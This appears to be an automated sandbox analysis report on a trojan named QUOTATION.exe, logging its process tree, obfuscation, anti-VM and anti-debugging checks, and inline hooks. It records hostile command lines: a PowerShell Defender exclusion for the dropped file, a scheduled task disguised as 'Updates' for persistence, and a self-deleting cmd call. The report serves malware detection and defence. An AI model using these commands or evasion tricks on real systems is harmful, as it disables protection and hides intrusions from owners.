Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION.exe Process created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe
Source: C:\Users\user\Desktop\QUOTATION.exe Process created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: C:\Users\user\Desktop\QUOTATION.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\QUOTATION.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe
Source: C:\Users\user\Desktop\QUOTATION.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp
Source: C:\Users\user\Desktop\QUOTATION.exe Process created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe
Source: C:\Users\user\Desktop\QUOTATION.exe Process created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe
Source: C:\Users\user\Desktop\QUOTATION.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\QUOTATION.exe"
Source: C:\Users\user\Desktop\QUOTATION.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\QUOTATION.exe File created: C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe
Source: C:\Users\user\Desktop\QUOTATION.exe File created: C:\Users\user\AppData\Local\Temp\tmp8E88.tmp
Source: classification engine Classification label: mal100.troj.evad.winEXE@17/8@2/1
Source: C:\Users\user\Desktop\QUOTATION.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\QUOTATION.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\QUOTATION.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: QUOTATION.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: QUOTATION.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: netstat.pdbGCTL source: QUOTATION.exe, 00000011.00000002.378505567.0000000000FA0000.00000040.00020000.sdmp
Source: Binary string: netstat.pdb source: QUOTATION.exe, 00000011.00000002.378505567.0000000000FA0000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: QUOTATION.exe, 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, QUOTATION.exe, 00000011.00000002.378732031.00000000010CF000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: QUOTATION.exe, QUOTATION.exe, 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, QUOTATION.exe, 00000011.00000002.378732031.00000000010CF000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: QUOTATION.exe, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: lQdAGavApIJoo.exe.1.dr, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.QUOTATION.exe.360000.0.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.QUOTATION.exe.360000.0.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.QUOTATION.exe.330000.0.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.QUOTATION.exe.330000.3.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.QUOTATION.exe.330000.2.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.QUOTATION.exe.330000.0.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.QUOTATION.exe.330000.1.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 17.0.QUOTATION.exe.520000.0.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 17.2.QUOTATION.exe.520000.1.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 17.0.QUOTATION.exe.520000.3.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 17.0.QUOTATION.exe.520000.5.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 17.0.QUOTATION.exe.520000.1.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 17.0.QUOTATION.exe.520000.2.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 17.0.QUOTATION.exe.520000.7.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 17.0.QUOTATION.exe.520000.9.unpack, Views/MainForm.cs .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 1_2_0036424F push es; iretd 1_2_0036425C
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 1_2_003642B1 push cs; iretd 1_2_003642CC
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 1_2_00364287 push cs; iretd 1_2_003642B0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 1_2_003642DB push ss; iretd 1_2_003642F6
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 1_2_00DAE768 pushfd ; ret 1_2_00DAE769
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 13_2_0033424F push es; iretd 13_2_0033425C
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 13_2_003342B1 push cs; iretd 13_2_003342CC
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 13_2_00334287 push cs; iretd 13_2_003342B0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 13_2_003342DB push ss; iretd 13_2_003342F6
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00417015 push esp; retf 17_2_00417041
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0041690B push cs; ret 17_2_0041690E
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0041D4B5 push eax; ret 17_2_0041D508
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0041D56C push eax; ret 17_2_0041D572
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0041D502 push eax; ret 17_2_0041D508
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0041D50B push eax; ret 17_2_0041D572
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0052424F push es; iretd 17_2_0052425C
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_005242DB push ss; iretd 17_2_005242F6
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00524287 push cs; iretd 17_2_005242B0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_005242B1 push cs; iretd 17_2_005242CC
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0102D0D1 push ecx; ret 17_2_0102D0E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0329D0D1 push ecx; ret 24_2_0329D0E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_00747015 push esp; retf 24_2_00747041
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0074690B push cs; ret 24_2_0074690E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0074DC11 push gs; ret 24_2_0074DC13
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0074D4B5 push eax; ret 24_2_0074D508
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0074D56C push eax; ret 24_2_0074D572
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0074D502 push eax; ret 24_2_0074D508
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0074D50B push eax; ret 24_2_0074D572
Source: initial sample Static PE information: section name: .text entropy: 7.84988973797

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\QUOTATION.exe File created: C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\QUOTATION.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xE1
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: /c del "C:\Users\user\Desktop\QUOTATION.exe"
Source: C:\Users\user\Desktop\QUOTATION.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 1.2.QUOTATION.exe.2751384.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: QUOTATION.exe PID: 6924, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: QUOTATION.exe, 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: QUOTATION.exe, 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\QUOTATION.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QUOTATION.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 0000000000739904 second address: 000000000073990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 0000000000739B7E second address: 0000000000739B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\QUOTATION.exe TID: 6928 Thread sleep time: -38290s >= -30000s
Source: C:\Users\user\Desktop\QUOTATION.exe TID: 6992 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4676 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\explorer.exe TID: 2808 Thread sleep time: -38000s >= -30000s
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6172 Thread sleep time: -32000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00409AB0 rdtsc 17_2_00409AB0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\QUOTATION.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7319
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1199
Source: C:\Users\user\Desktop\QUOTATION.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\QUOTATION.exe Thread delayed: delay time: 38290
Source: C:\Users\user\Desktop\QUOTATION.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000013.00000000.308707041.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000013.00000000.304892797.00000000067BE000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATA
Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000013.00000000.328622205.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 00000013.00000000.308707041.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000013.00000000.304892797.00000000067BE000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000013.00000000.304892797.00000000067BE000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: explorer.exe, 00000013.00000000.308707041.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00409AB0 rdtsc 17_2_00409AB0
Enables debug privileges
Source: C:\Users\user\Desktop\QUOTATION.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\QUOTATION.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FD58EC mov eax, dword ptr fs:[00000030h] 17_2_00FD58EC
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FFB8E4 mov eax, dword ptr fs:[00000030h] 17_2_00FFB8E4
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FD40E1 mov eax, dword ptr fs:[00000030h] 17_2_00FD40E1
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0100513A mov eax, dword ptr fs:[00000030h] 17_2_0100513A
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FD9080 mov eax, dword ptr fs:[00000030h] 17_2_00FD9080
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0100A185 mov eax, dword ptr fs:[00000030h] 17_2_0100A185
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01002990 mov eax, dword ptr fs:[00000030h] 17_2_01002990
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010061A0 mov eax, dword ptr fs:[00000030h] 17_2_010061A0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010569A6 mov eax, dword ptr fs:[00000030h] 17_2_010569A6
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010949A4 mov eax, dword ptr fs:[00000030h] 17_2_010949A4
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FF0050 mov eax, dword ptr fs:[00000030h] 17_2_00FF0050
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010551BE mov eax, dword ptr fs:[00000030h] 17_2_010551BE
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FFA830 mov eax, dword ptr fs:[00000030h] 17_2_00FFA830
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FEB02A mov eax, dword ptr fs:[00000030h] 17_2_00FEB02A
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010641E8 mov eax, dword ptr fs:[00000030h] 17_2_010641E8
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01057016 mov eax, dword ptr fs:[00000030h] 17_2_01057016
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FDB1E1 mov eax, dword ptr fs:[00000030h] 17_2_00FDB1E1
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A4015 mov eax, dword ptr fs:[00000030h] 17_2_010A4015
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0100002D mov eax, dword ptr fs:[00000030h] 17_2_0100002D
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FF99BF mov ecx, dword ptr fs:[00000030h] 17_2_00FF99BF
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FF99BF mov eax, dword ptr fs:[00000030h] 17_2_00FF99BF
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01092073 mov eax, dword ptr fs:[00000030h] 17_2_01092073
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FFC182 mov eax, dword ptr fs:[00000030h] 17_2_00FFC182
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A1074 mov eax, dword ptr fs:[00000030h] 17_2_010A1074
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01053884 mov eax, dword ptr fs:[00000030h] 17_2_01053884
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FDB171 mov eax, dword ptr fs:[00000030h] 17_2_00FDB171
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FDC962 mov eax, dword ptr fs:[00000030h] 17_2_00FDC962
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010020A0 mov eax, dword ptr fs:[00000030h] 17_2_010020A0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010190AF mov eax, dword ptr fs:[00000030h] 17_2_010190AF
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FFB944 mov eax, dword ptr fs:[00000030h] 17_2_00FFB944
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0100F0BF mov ecx, dword ptr fs:[00000030h] 17_2_0100F0BF
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0100F0BF mov eax, dword ptr fs:[00000030h] 17_2_0100F0BF
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0106B8D0 mov eax, dword ptr fs:[00000030h] 17_2_0106B8D0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0106B8D0 mov ecx, dword ptr fs:[00000030h] 17_2_0106B8D0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FF4120 mov eax, dword ptr fs:[00000030h] 17_2_00FF4120
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FF4120 mov ecx, dword ptr fs:[00000030h] 17_2_00FF4120
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FD9100 mov eax, dword ptr fs:[00000030h] 17_2_00FD9100
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0109131B mov eax, dword ptr fs:[00000030h] 17_2_0109131B
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FEAAB0 mov eax, dword ptr fs:[00000030h] 17_2_00FEAAB0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A8B58 mov eax, dword ptr fs:[00000030h] 17_2_010A8B58
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FD52A5 mov eax, dword ptr fs:[00000030h] 17_2_00FD52A5
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01003B7A mov eax, dword ptr fs:[00000030h] 17_2_01003B7A
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0109138A mov eax, dword ptr fs:[00000030h] 17_2_0109138A
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0108D380 mov ecx, dword ptr fs:[00000030h] 17_2_0108D380
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0100138B mov eax, dword ptr fs:[00000030h] 17_2_0100138B
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0100B390 mov eax, dword ptr fs:[00000030h] 17_2_0100B390
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01002397 mov eax, dword ptr fs:[00000030h] 17_2_01002397
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01004BAD mov eax, dword ptr fs:[00000030h] 17_2_01004BAD
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A5BA5 mov eax, dword ptr fs:[00000030h] 17_2_010A5BA5
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FD9240 mov eax, dword ptr fs:[00000030h] 17_2_00FD9240
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010553CA mov eax, dword ptr fs:[00000030h] 17_2_010553CA
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FFA229 mov eax, dword ptr fs:[00000030h] 17_2_00FFA229
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010003E2 mov eax, dword ptr fs:[00000030h] 17_2_010003E2
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FF3A1C mov eax, dword ptr fs:[00000030h] 17_2_00FF3A1C
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FDAA16 mov eax, dword ptr fs:[00000030h] 17_2_00FDAA16
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010823E3 mov ecx, dword ptr fs:[00000030h] 17_2_010823E3
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010823E3 mov eax, dword ptr fs:[00000030h] 17_2_010823E3
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FD5210 mov eax, dword ptr fs:[00000030h] 17_2_00FD5210
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FD5210 mov ecx, dword ptr fs:[00000030h] 17_2_00FD5210
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE8A0A mov eax, dword ptr fs:[00000030h] 17_2_00FE8A0A
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FFDBE9 mov eax, dword ptr fs:[00000030h] 17_2_00FFDBE9
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0109AA16 mov eax, dword ptr fs:[00000030h] 17_2_0109AA16
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01014A2C mov eax, dword ptr fs:[00000030h] 17_2_01014A2C
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01064257 mov eax, dword ptr fs:[00000030h] 17_2_01064257
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0109EA55 mov eax, dword ptr fs:[00000030h] 17_2_0109EA55
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0108B260 mov eax, dword ptr fs:[00000030h] 17_2_0108B260
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A8A62 mov eax, dword ptr fs:[00000030h] 17_2_010A8A62
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE1B8F mov eax, dword ptr fs:[00000030h] 17_2_00FE1B8F
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0101927A mov eax, dword ptr fs:[00000030h] 17_2_0101927A
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0100D294 mov eax, dword ptr fs:[00000030h] 17_2_0100D294
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FDDB60 mov ecx, dword ptr fs:[00000030h] 17_2_00FDDB60
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FDF358 mov eax, dword ptr fs:[00000030h] 17_2_00FDF358
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0100FAB0 mov eax, dword ptr fs:[00000030h] 17_2_0100FAB0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FDDB40 mov eax, dword ptr fs:[00000030h] 17_2_00FDDB40
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01002ACB mov eax, dword ptr fs:[00000030h] 17_2_01002ACB
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01002AE4 mov eax, dword ptr fs:[00000030h] 17_2_01002AE4
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h] 17_2_01094AEF
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h] 17_2_00FFA309
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0109E539 mov eax, dword ptr fs:[00000030h] 17_2_0109E539
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0105A537 mov eax, dword ptr fs:[00000030h] 17_2_0105A537
